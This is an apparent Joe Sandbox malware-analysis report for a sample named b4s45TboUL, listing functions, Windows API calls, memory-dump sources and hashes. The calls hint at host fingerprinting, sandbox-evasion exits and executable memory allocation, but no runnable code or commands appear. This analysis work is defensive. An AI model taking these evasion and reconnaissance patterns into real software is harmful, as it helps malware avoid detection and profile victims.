Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: CloseHandle
String ID: winClose
API String ID: 2962429428-4219828513
Opcode ID: c60c52094e65ead93584bd01b08d1abc788ebbc504c85440e44ebfbab32f71d9
Instruction ID: 774f0b390e99eda96ce63d5266cab459109c075f265339c96ef3e2cb904a27c1
Opcode Fuzzy Hash: c60c52094e65ead93584bd01b08d1abc788ebbc504c85440e44ebfbab32f71d9
Instruction Fuzzy Hash: EBF09670B043259BE700AF75C5C4A5AFBA4EF89314F20C46DD8898B342D73AD944CB92

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66

Function 0040B4C0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrlenA.KERNEL32(00000000), ref: 0040B992
lstrlenA.KERNEL32(00000000), ref: 0040B9A6

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$memcmp
String ID:
API String ID: 3457870978-0
Opcode ID: d718eb297d2c1fa87a7bbca561b5cbf439e73f9ad7ab37fce845a7d1a2079457
Instruction ID: 2255bc3e1aae02863dcd83073914f46634cd1c5da6bc7bd4c07d15e0a17c61c2
Opcode Fuzzy Hash: d718eb297d2c1fa87a7bbca561b5cbf439e73f9ad7ab37fce845a7d1a2079457
Instruction Fuzzy Hash: BAE14672A111189BCB04FBA1DD66EEE7339AF14314F40459EF10672095EF387B98CB6A

Function 0040AEC0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

lstrlenA.KERNEL32(00000000), ref: 0040B13A
lstrlenA.KERNEL32(00000000), ref: 0040B14E

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 28efb8b6764b4714764abcffd5bb701b7200d1696dc845e6d1e24e81cabdc56f
Instruction ID: b118e420acb74f1bad9678fc0f4fca3608bd39bb9752133bd9c886ddfd0b535b
Opcode Fuzzy Hash: 28efb8b6764b4714764abcffd5bb701b7200d1696dc845e6d1e24e81cabdc56f
Instruction Fuzzy Hash: A8916672A151089BCB04FBA1DC66DEE7339AF14314F40456FF10663195EF387A98CB6A

Function 0040B200 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

lstrlenA.KERNEL32(00000000), ref: 0040B3FE
lstrlenA.KERNEL32(00000000), ref: 0040B412

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 527ce95fccc19ec0b7c1c15eb4c668e5f89ac8bb418c506540bb58863ee12996
Instruction ID: df39fec182a976cf14ea74314fd1cc2d61bc45c83f0c5b543270b10835f39725
Opcode Fuzzy Hash: 527ce95fccc19ec0b7c1c15eb4c668e5f89ac8bb418c506540bb58863ee12996
Instruction Fuzzy Hash: B4715271A111089BCB04FBA1DCA6DEE733AAF14314F40456FF50267195EF387A58CBAA

Function 004066B0 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00406E0E,00406E0E,00003000,00000040), ref: 00406756
VirtualAlloc.KERNEL32(00000000,00406E0E,00003000,00000040), ref: 004067A3

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
Instruction ID: 1e55e6aee22da07579867dcc14e26085db0c1923c06382e7ddd462ac09197dec
Opcode Fuzzy Hash: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
Instruction Fuzzy Hash: 6041D474A00209EFCB54CF58C494BADBBB1FF44314F1486A9E949AB385D735EA91CF84

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4

Function 00418F20 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e4e61478786545620c941bfdebde28148ee30d40bfd2ffe50c48c5d67029bfc3
Instruction ID: 622f2f336d6b1c39152e8ed1c6124f6159486e78b27092244718ebba6cc61b65
Opcode Fuzzy Hash: e4e61478786545620c941bfdebde28148ee30d40bfd2ffe50c48c5d67029bfc3
Instruction Fuzzy Hash: 7EF01C70D0520CEBCB00EF94D4496DDBB75EB00324F10819AE82967280DB385B96CB89

Function 00418F70 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 6d5c486f1174f401a7d52f4a33802c5c22497fe214560b0ce90e5b19e21db00a
Instruction ID: e79076dc3140f9edc5567924fb21932d6a0b2d79ef3805787682db2ce51b8011
Opcode Fuzzy Hash: 6d5c486f1174f401a7d52f4a33802c5c22497fe214560b0ce90e5b19e21db00a
Instruction Fuzzy Hash: 92E0127194434C6BDB51DB50CC96FDD776D9B44B11F004295BA0C5B1C0DE70AB858B95

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169

Function 61E0AE03 Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 61E0AE3D

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
Instruction ID: a929929d55870eb2e3dfc3d9b08de53e37bb6c9da6c43a06ed963554b33c57a4
Opcode Fuzzy Hash: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
Instruction Fuzzy Hash: A5F090B1554708CFDB006FA8E8C52153BA4F746219F5840BAE8150B201D735D5E1CB91

Function 00409910 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000020,004108B9,?,?), ref: 00409918

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
Instruction ID: 7a81cf42230454625edcc1d807e760a9f48c6c1e1b7ee97c20b10c4417f739aa
Opcode Fuzzy Hash: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
Instruction Fuzzy Hash: F3F054B4D00208FBDB00EFA5C846B9EBBB49B08304F1085A9F905A7381E674AB14CB95

Function 61E2A6AF Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 61E2A6BF

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
